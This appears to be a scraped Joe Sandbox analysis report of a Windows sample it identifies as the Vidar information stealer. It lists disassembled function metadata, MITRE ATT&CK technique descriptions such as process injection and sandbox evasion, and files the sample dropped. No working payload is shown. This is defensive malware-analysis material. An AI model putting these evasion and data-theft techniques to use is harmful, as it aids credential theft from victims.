Opcode ID: 91242230ce68a24c4f38e49356161a9258fe8054196df98927784ca714c59dc8
Instruction ID: e23b5eb9a1e42f9e221b8677ce3c7703de2c6ddbdd5f367577b3bfe0c378d6ff
Opcode Fuzzy Hash: 91242230ce68a24c4f38e49356161a9258fe8054196df98927784ca714c59dc8
Instruction Fuzzy Hash: 0111E131304210DBDB24DE6DD88095973A6AF55324754063BF815EFAC2C33CED49879A

Function 0040F34D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F35C

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

memmove.MSVCRT(0040EEBE,0040EEBE,C6C68B00,0040EEBE,0040EEBE,0040F15F,?,?,?,0040F1DF,?,?,?,74DF0440,?,-00000001), ref: 0040F392

Strings

invalid string position, xrefs: 0040F357

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: 348d0c2b69c2b191df159d42681712194dc71b74dbe289b0b6df523c31963809
Instruction ID: a91313bf5449129972d3e0b6c61bf396901b99abf7d864de5386db584678c47f
Opcode Fuzzy Hash: 348d0c2b69c2b191df159d42681712194dc71b74dbe289b0b6df523c31963809
Instruction Fuzzy Hash: 6F01AD713007018BD7348E7989C491FB2E2EB85B21734493ED882D7B85DB7CE84E8398

Function 004281C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strcpy_s.MSVCRT ref: 004281DE
__invoke_watson.LIBCMT ref: 00428232

Part of subcall function 0042806D: _strcat_s.LIBCMT ref: 0042808C

Strings

,NC, xrefs: 0042821D

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __invoke_watson_strcat_sstrcpy_s
String ID: ,NC
API String ID: 1132195725-1329140791
Opcode ID: 53b9d3399cf01edd424f01e545b4bf6b1a8555bf483cd13445593f0413521323
Instruction ID: d9baa1639a8d6cddfa45c7016c3352d2dd6dfe7468836747954bbe6ada87296f
Opcode Fuzzy Hash: 53b9d3399cf01edd424f01e545b4bf6b1a8555bf483cd13445593f0413521323
Instruction Fuzzy Hash: 96F02872641228BFCF116FA0EC42EEF3F59AF00350F44806AF91955151DB369D54C764

Function 004124A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 004124B2
CloseHandle.KERNEL32(00000000), ref: 00412521

Strings

steam.exe, xrefs: 004124B7, 00412500

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseH_prolog3_catch_Handle
String ID: steam.exe
API String ID: 860495366-2826358650
Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15

Function 0042806D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

_strcat_s.LIBCMT ref: 0042808C
__invoke_watson.LIBCMT ref: 004280A8

Strings

`8C, xrefs: 0042807E, 00428084

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __invoke_watson_strcat_s
String ID: `8C
API String ID: 228796091-1339866851
Opcode ID: d2307989adf0da250e0c2039779c175f09f7b7af11d147463b8ee5fd369ca3e3
Instruction ID: b7dcb7c8242e45e9edc672ca800bd55fb05ba849de6ed2c4d9e7ea01795509d3
Opcode Fuzzy Hash: d2307989adf0da250e0c2039779c175f09f7b7af11d147463b8ee5fd369ca3e3
Instruction Fuzzy Hash: 42E09273600219ABDF101E66EC4189F771AFF80368B46043AFE1852102D63599A69698

Function 0041F3BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0041F3F0
DName::DName.LIBCMT ref: 0041F3FC

Strings

{flat}, xrefs: 0041F3EB

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
Instruction ID: da75913b68d6d07b0bcc9ceeb751d75e82138ebb165cf24839429cfec7228cb0
Opcode Fuzzy Hash: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
Instruction Fuzzy Hash: 75F08535244208AFCB11EF59D445AE43BA0AF8575AF08808AF9484F293C774E882CB99

Function 0040141E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401436
GlobalMemoryStatusEx.KERNEL32(?), ref: 00401449

Strings

@, xrefs: 00401442

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus_memset
String ID: @
API String ID: 587104284-2766056989
Opcode ID: ea78773fa3532b546fc2bed9ec4844f5fa5bd431fc3f66efb89effc32c35708b
Instruction ID: 109ca1747397a3c99a2e715ad0f668a42f12933073e5ea0efda9a81ab0e3fd91
Opcode Fuzzy Hash: ea78773fa3532b546fc2bed9ec4844f5fa5bd431fc3f66efb89effc32c35708b
Instruction Fuzzy Hash: 7BE0B8F1D002089BDB54DFA5ED46B5D77F89B08708F5000299A05F7181D674AA099659

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_e235e8390a5f5d4ab4774135de2aa259e4fc77_f98b0a6f_25a09605-2cc1-4c26-9cf8-a24aca792532\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9397.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER94F0.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER956E.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199780418869[1].htm

C:\Users\user\AppData\Local\Temp\delays.tmp

C:\Windows\appcompat\Programs\Amcache.hve

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Windows Analysis Report
file.exe

Function 023D212D Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Function 02330C40 Relevance: 2.8, Strings: 2, Instructions: 320
COMMON

Function 023312E1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88
COMMON

Function 02331218 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59
COMMON

Function 02331220 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
COMMON

Function 00411807 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 143
comtimeCOMMON

Function 00406963 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 161
networkfileCOMMON

Function 00405482 Relevance: 35.6, APIs: 4, Strings: 16, Instructions: 573
networkCOMMON

Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129
memoryfileCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre